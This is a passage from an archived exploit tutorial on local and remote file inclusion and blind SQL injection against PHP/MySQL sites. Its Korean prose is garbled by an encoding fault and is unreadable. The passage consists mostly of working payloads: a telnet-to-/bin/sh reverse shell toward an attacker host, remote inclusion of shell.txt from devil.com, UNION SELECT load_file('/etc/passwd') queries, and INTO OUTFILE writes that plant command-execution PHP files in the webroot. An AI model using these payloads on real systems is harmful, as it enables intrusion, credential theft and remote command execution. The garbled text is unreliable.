8888 pepelux:~$ nc -vv -l -p 8889 http://host/?file=xxxx&cmd=telnet devil 8888 | /bin/sh | telnet devil 8889 ----[ 2.4 - Remote File Inclusion allow_url_include°¡ php.ini¾È¿¡ Á¸ÀçÇÑ´Ù¸é, ¿ì¸®´Â Á÷Á¢ÀûÀ¸·Î ½©À» »ðÀÔÇÒ ¼ö ÀÖ´Ù. ¹æ¹ýÀº ÀÌÀü¿¡ ÀÛ¼ºÇß´ø °Í°ú µ¿ÀÏÇϸç Àß ¾Ë·ÁÁ®ÀÖ´Ù. ´ç½ÅÀº URI¿¡ GET ȤÀº POST¸¦ »ç¿ëÇÏ¿© ½©À» ÀûÀ縸 ÇϸéµÈ´Ù.(PHP È®ÀåÀÌ ¾Æ´Ñ °ÍÀ» »ç¿ëÇÏ¿©) http://host/?file=http://devil.com/shell.txt http://host/?file=http://devil.com/shell.txt%00 ---[ 3 - Blind SQL Injection ----[ 3.1 - ¼Ò°³ SQL injection °ø°ÝµéÀº ¸¹ÀÌ ¾Ë·ÁÁö°í, ¸¹ÀÌ ¹®¼­È­µÇ¾ú´Ù. ³ª´Â ´õÀÌ»ó °°Àº Á¾·ùÀÇ °ÍµéÀ» ¾²±â ½È´Ù. ³­ ±×Àú ½Ã½ºÅÛ ÆÄÀϵéÀ» ÀÐÀ» ¼ö ÀÖ´Â Å×Å©´Ð¿¡ ´ëÇÑ ÀÛ¼ºÇÏ·Á°í ÇÑ´Ù. ----[ 3.2 - ·ÎÄà ÆÄÀÏ Àоî¿À±â SQL injection À¥Ãë¾àÁ¡À¸·Î, À¯Àú°¡ load_fileÀ» ÇÏ·Á°í Æ۹̼ÇÀ» »ç¿ëÇÑ´Ù¸é, /etc/passwd¿Í °°Àº ¾î¶² ½Ã½ºÅÛ ÆÄÀÏÀ̵ç ÀÐÀ» ¼ö ÀÖ´Ù. ¿¹: Table: users(id int, user char(25), pass char(25), mail char(255)); Datas: +---+---------+----------------------------------+--------------+ | 1 | admin | 23e4ad2360f4ef4268cb44871375a5cd | admin@host | +---+---------+----------------------------------+--------------+ | 2 | pepelux | 655ed32360580ac468cb448722a1cd4f | pepelux@host | +---+---------+----------------------------------+--------------+ Ãë¾à ÄÚµå: ¾Ë·ÁÁöÁö ¾ÊÀº Å×À̺í°ú ¾Ë·ÁÁöÁö ¾ÊÀº ÇʵåµéÀ» °¡Áö°í ÀÖ´Â, È­¸é¿¡ ¾î¶°ÇÑ ¿¡·¯·Î ³ªÅ¸³»Áö ¾Ê´Â MYSQLÀ» °¡Áö°í ÀÖ´Ù. > À¯Àú 2ÀÇ ¸ÅÀÏÀ» º¸´Â ¿Ã¹Ù¸¥ È£Ãâ: http://host/?id=2 > SQL InjectionÀ» ÀÌ¿ëÇØ reorder Äõ¸® °á°ú¸¦ ½ÃµµÇÑ´Ù: http://host/?id=2 ORDER BY 1 ... Ok http://host/?id=2 ORDER BY 2 ... Ok http://host/?id=2 ORDER BY 3 ... Ok http://host/?id=2 ORDER BY 4 ... Ok http://host/?id=2 ORDER BY 5 ... Error ¿Ö ORDER BY 5°¡ ¿¡·¯¸¦ ¹ß»ý½ÃÄ×À»±î? ÀÏ¹Ý À¯Àú°¡ °á°ú¸¦ ¸í·ÉÇÑ MYSQL¿¡ ORDER BY 2¸¦ »ç¿ëÇß´Ù¸é, ¿ì¸®´Â ±×°ÍÀ» pass columnÀ¸·Î orderÇÒ ¼ö ÀÖÁö¸¸, ÀÌ Å×À̺íÀº ¿ÀÁ÷ 4 column¸¸ °¡Áö±â ¶§¹®¿¡, ORDER BY 5´Â ¿¡·¯¸¦ ¹ß»ý½ÃŲ °ÍÀÌ´Ù. ¿Ö ±×°ÍÀÌ À¯¿ëÇÑ°¡? ¿ì¸®´Â Å×À̺íÀÌ °¡Áø columnÀÇ °¹¼ö¸¦ ¾Ë ¼ö ÀÖ´Ù. > È­¸é¿¡¼­ º¼ ¼ö ÀÖ´Â ´äº¯ ¼öÁ¤Çϱâ (¿ì¸®´Â °Å±â¿¡ 4°³ÀÇ columnÀÌ ÀÖ´Ù´Â °ÍÀ» ¾È´Ù): http://host/?id=-1 UNION SELECT 1,2,3,4 À§´Â ¹«¾ùÀ» Çϳª? ¿ì¸®´Â À¯Àú¸¦ ID=-1·Î ã°í, 0°³ÀÇ °á°ú·Î ÀÀ´äÇÏ°í, »ðÀÔµÈ µ¥ÀÌÅÍ¿Í ÇÔ²² »õ·Î¿î ¶óÀÎÀ» ¸¸µé °ÅÀÌ´Ù. ¿Ö ¿ì¸®°¡ ID=-1À» »ç¿ëÇؾßÇϳª? ¿¬½À ¿¹Á¦¸¦ º¼ ¼ö ÀÖ´Ù: ´ÙÀ½°°ÀÌ º¸³½´Ù: http://host/?id=2 UNION SELECT 1,2,3,4 We obtain: +---+---------+----------------------------------+--------------+ | 2 | pepelux | 655ed32360580ac468cb448722a1cd4f | pepelux@host | +---+---------+----------------------------------+--------------+ | 1 | 2 | 3 | 4 | +---+---------+----------------------------------+--------------+ ¿ÀÁ÷ ù¹ø° ¶óÀθ¸À» ¼±ÅÃÇϸé, ´ÙÀ½°ú °°Àº °ÍÀ» È­¸é¿¡¼­ º¼ ¼ö ÀÖ´Ù: User mail is: pepelux@host ID=-1À» ³ÖÀ¸¸é »ðÀÔµÈ µ¥ÀÌÅ͸¦ ¾ò´Â´Ù: ´ÙÀ½À» º¸³½´Ù: http://host/?id=-1 UNION SELECT 1,2,3,4 ´ÙÀ½À» ¾ò´Â´Ù: +---+---------+----------------------------------+--------------+ | 1 | 2 | 3 | 4 | +---+---------+----------------------------------+--------------+ È­¸é¿¡¼­ ´ÙÀ½À» º¼ °ÍÀÌ´Ù: User mail is: 4 > 4¹ø° columnÀ» »ðÀÔÇϱâ À§ÇØ »ç¿ëÇÑ´Ù( È­¸é¿¡¼­ ¿ì¸®°¡ º¼ ¼ö ÀÖ´Â 4¹ø° column): http://host/?id=-1 UNION SELECT 1,2,3,load_file('/etc/passwd'); ÀÌ°ÍÀº /etc/passwd ³»¿ëÀ» mail user À§Ä¡¿¡ »Ñ·ÁÁÙ °ÍÀÌ´Ù.( ÀÌ °ÍÀº mysql À¯Àú°¡ load_fileÀ» ½ÇÇàÇϱâ À§ÇØ has permissionsÀ» »ç¿ëÇßÀ»¶§¸¸ °¡´ÉÇÏ´Ù) magic_quotes°¡ OnÀÎ °æ¿ì¿¡´Â hex °ªÀ» »ç¿ëÇÒ ¼ö ÀÖ´Ù: http://host/?id=-1 UNION SELECT 1,2,3,load_file(0x2f6574632f706173737764); LFI¸¦ ÀÌ¿ëÇÏ¿© ÆÄÀÏÀ» Àд°Ͱú SQL injectionÀ» ÀÌ¿ëÇÏ¿© ÆÄÀÏÀ» Àд°ÍÀÇ Â÷ÀÌ´Â ÆÄÀϵéÀ» Àбâ À§ÇØ »ç¿ëÇÏ´Â ´Ù¸£´Ù´Â °ÍÀÌ´Ù. ù¹ø° °æ¿ì¿¡´Â ¾ÆÆÄÄ¡ À¯Àú¸¦ »ç¿ëÇÏ°í µÎ¹ø° °æ¿ì¿¡´Â MySQl À¯Àú¸¦ »ç¿ëÇÑ´Ù. ÀÌ°Ç ¾ÆÁÖ À¯¿ëÇÏÁö ¾ÊÁö¸¸, ´Ù¸¥ ±ÇÇÑ¿¡¼­ÀÇ µ¿ÀÏÇÑ ÆÄÀÏÀ» Àдµ¥ À¯¿ëÇÒ ¼ö ÀÖ´Ù. ----[ 3.3 - ºê·çÆ®Æ÷½º ¾øÀÌ µ¥ÀÌÅ͸¦ ȹµæÇϱâ ÀÌÀü¿¡ ÀÛ¼ºÇÑ µ¿ÀÏÇÑ Ãë¾à ÄÚµå¿Í °°Àº »óȲÀÌ¶ó °¡Á¤ÇÏÀÚ: Table: users(id int, user char(25), pass char(25), mail char(255)); Datas: +---+---------+----------------------------------+--------------+ | 1 | admin | 23e4ad2360f4ef4268cb44871375a5cd | admin@host | +---+---------+----------------------------------+--------------+ | 2 | pepelux | 655ed32360580ac468cb448722a1cd4f | pepelux@host | +---+---------+----------------------------------+--------------+ ´ÙÀ½°ú °°ÀÌ Çϸé, ÀÌ Å×À̺íÀÇ ¸ðµç µ¥ÀÌÅ͸¦ º¼ ¼ö ÀÖ´Ù: http://host/?id=1 outfile "/tmp/sql.txt" http://host/?id=-1 UNION SELECT 1,2,3,load_file('/tmp/sql.txt'); /tmp/sql.txt ³»¿ëÀº: 1 admin 23e4ad2360f4ef4268cb44871375a5cd admin@host À§¿¡¼­ º¸µíÀÌ, Å×À̺í À̸§À̳ª ÇʵåµéÀÇ À̸§À» ¾Ë ÇÊ¿ä ¾øÀÌ ID=1ÀÎ À¯ÀúÀÇ ¸ðµç µ¥ÀÌÅ͸¦ ÃßÃâÇß´Ù. °°Àº ¹æ¹ýÀ¸·Î ¸ðµç À¯ÀúÀÇ ÇʵåµéÀ» ÃßÃâ ÇÒ ¼ö ÀÖ´Ù. ÀÌ °ø°ÝÀÇ ¹®Á¦´Â Äõ¸®¿¡¼­ »ç¿ëµÈ Å×À̺íÀÇ µ¥ÀÌÅ͸¸ ÀÐÀ» ¼öÀÖ´Ù´Â °ÍÀÌ´Ù. ÀÌ ±â¹ýÀ» ÀÌ¿ëÇؼ­ ·ÎÄà µð·ºÅ丮ÀÇ ½Ã½ºÅÛ ÆÄÀϵéÀ» webÀ¸·Î Á¢±ÙÇϱâ À§ÇØ Ä«ÇÇ ÇÒ ¼ö ÀÖ´Ù. ¿¹¸¦µé¸é: http://host/?id=-1 union select 1,load_file("/etc/passwd"),1 into outfile "/var/www/host.com/www/passwd" ±×¸®°í PHP ÆÄÀϵéÀ» ¸¸µé ¼ö ÀÖ´Ù. ¿¹¸¦ µé¸é: http://host/?id=-1 union select 1,"",1 into outfile "/var/www/host.com/www/phpinfo.php" ----[ 3.4 - ¿ø°ÝÀ¸·Î ¸í·É¾îµé ½ÇÇàÇϱâ Áö±Ý±îÁö ¿ø°ÝÀ¸·Î ¸í·É¾î¸¦ ½ÇÇàÇϱâ À§ÇÑ °¡´É¼ºÀ» ÁÖ´Â ¸¦ »ðÀÔÇϱâÀ§ÇÑ ¿©·¯°¡Áö ¹æ¹ýµéÀ» ºÃ´Ù. ¿ì¸®°¡ ãÀº ÁÖ¿ä ¹®Á¦´Â PHP Äڵ带 ÀÛ¼ºÇϱâ À§ÇÑ ÆÄÀÏÀ» ã´Â °ÍÀÌ´Ù. ¾ÆÆÄÄ¡ ·Î±×µéÀº ã±â º¹ÀâÇÏ°Ô µÇ¾îÀÖ°í, ÀÏ¹Ý À¯Àú°¡ ±×°ÍÀ» ÀÐÀ» ¼ö ÀÖ´Â ±ÇÇÑÀ» °¡Áú ¼ö ¾ø´Â °¡´É¼ºÀÌ Á¸ÀçÇÑ´Ù. ÀÌ·¯ÇÑ °æ¿ì´Â È­¸é¿¡ À¥»çÀÌÆ®ÀÇ °æ·Î¸¦ º¸±â À§ÇÑ error¸¦ À¯¹ßÇϱ⠽±´Ù. ¸¸¾à, ¿ì¸®°¡ ¸í·É¾î¸¦ ½ÇÇàÇÒ ¼ö ÀÖµµ·Ï Çã¿ëÇÏ´Â PHP ÆÄÀÏÀ» ¸¸µé ¼ö ÀÖ´Ù´Â °ÍÀ» ¾È´Ù¸é: http://host/?id=-1 union select 1,"",1 into outfile "/var/www/host.com/www/cmd.php" ´ÙÀ½À¸·Î ÇؾßÇÒ °ÍÀº: http://host/cmd.php?cmd=uname -a If the website is vulnerable to LFI attacks we can write the PHP code in any place that we have writeable permissions. For example in /tmp: ¸ÕÀú, /tmp¾ÈÀÇ ÆÄÀÏ¿¡ Äڵ带 »ðÀÔÇÒ ¼ö ÀÖ´Ù: http://host/?id=-1 union select 1,"",1,1 into outfile "/tmp/sql.txt" ´ÙÀ½À¸·Î ¸í·É¾î¸¦ ½ÇÇà½ÃÅ°±â À§ÇØ LFI¸¦ »ç¿ëÇÑ´Ù: http://host/?file=../../../tmp/sql.txt&cmd=uname -a ----[ 3.5 - ½© ȹµæÇϱâ Áö±Ý±îÁö ¿ì¸®ÀÇ PHPÄڵ带 Æ÷ÇÔÇÏ´Â ÆÄÀÏÀ» ¸¸µé¾ú´Ù¸é, ½©À» ȹµæÇϱâ À§ÇÑ ¹æ¹ýÀº ÀÌÀüÀÇ LFI¿¡¼­ ¼³¸íÇÑ ¹æ¹ý°ú µ¿ÀÏÇÏ´Ù. (2.3ÆÄÆ®¿¡¼­ º¼ ¼ö ÀÖ´Ù) :-) ---[ 4 - Âü°íÀÚ·á - http://www.g-brain.net/tutorials/local-file-inclusions.txt - http://ush.it/team/ascii/hack-lfi2rce_proc/lfi2rce.txt - http://www.securityfocus.com/bid/3473 - http://dev.mysql.com/doc/ # milw0rm.com [2008-10-12]